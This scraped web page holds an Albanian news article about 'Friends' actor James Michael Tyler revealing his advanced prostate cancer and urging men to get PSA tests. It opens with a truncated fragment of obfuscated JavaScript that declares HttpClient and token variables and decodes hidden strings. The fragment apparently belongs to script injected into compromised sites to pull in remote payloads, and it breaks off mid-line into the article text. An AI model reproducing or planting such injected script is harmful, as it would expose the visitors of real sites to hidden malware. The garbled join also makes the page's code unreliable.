;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Aktori i “Friends” zbulon sëmundjen e tij

By

Aktori i serialit “Friends” James Michael Tyler ka zbuluar se ai po lufton nga sëmundja e kancerit të prostatës.

James, e ndau lajmin gjatë një paraqitje të hënën në emisionin “Today”, ku shpjegoi se u diagnostikua për herë të parë në moshën 56 vjeçare dhe ka qenë duke u marrë me atë diagnozë për pothuajse tre vitet e fundit.

“Unë u diagnostikova me kancer të prostatës, i cili ishte përhapur në kockat e mia, sëmundja është në fazën e katërt, më të vonën, kështu që përfundimisht, do të më marrë ndoshta”.

Tyler tha se diagnoza dhe trajtimi i tij i vazhdueshëm nuk ka qenë një proces i lehtë, dhe se ai nuk dëshiron që njerëzit të kalojnë nëpër ato që unë kam kaluar.

Friends star James Michael Tyler reveals prostate cancer diagnosis | Metro  News

“Qëllimi im vitin e kaluar ishte të prisjaditëlindjen time të 59-të,” tha aktori. “Unë e arrita atë, ndërsa qëllimi im tani, është të ndihmoj të paktën të shpëtoj një jetë”.

“Herën tjetër që do të shkoni vetëm për një kontroll, ju lutemi bëni një test ‘PSA’, është lehtësisht e dallueshme,” tha ai. “Nëse përhapet përtej prostatës në kocka, e cila është më e përhapura në formën time, mund të jetë shumë më e vështirë për tu trajtuar”.

Sëmundja e tij e ndaloi atë të shfaqej personalisht në ribashkimin special të “Friends”, i cili u transmetua muajin e kaluar, por, në vend të kësaj, ai bëri një paraqitje përmes Zoom.

James Michael Tyler (Gunther the coffee barista in the NBC comedy FRIENDS) at a public appearance for James Michael Tyler Appears at Central Perk for the Today Show, Eight O”Clock Coffee Pop-Up Store at 199 Lafayette St., New York, NY September 15, 2014. Photo By: Derek Storm/Everett Collection

Tyler u shfaq në 10 sezonet e serialit Friends. /Prive.al

Artikuj të ngjashëm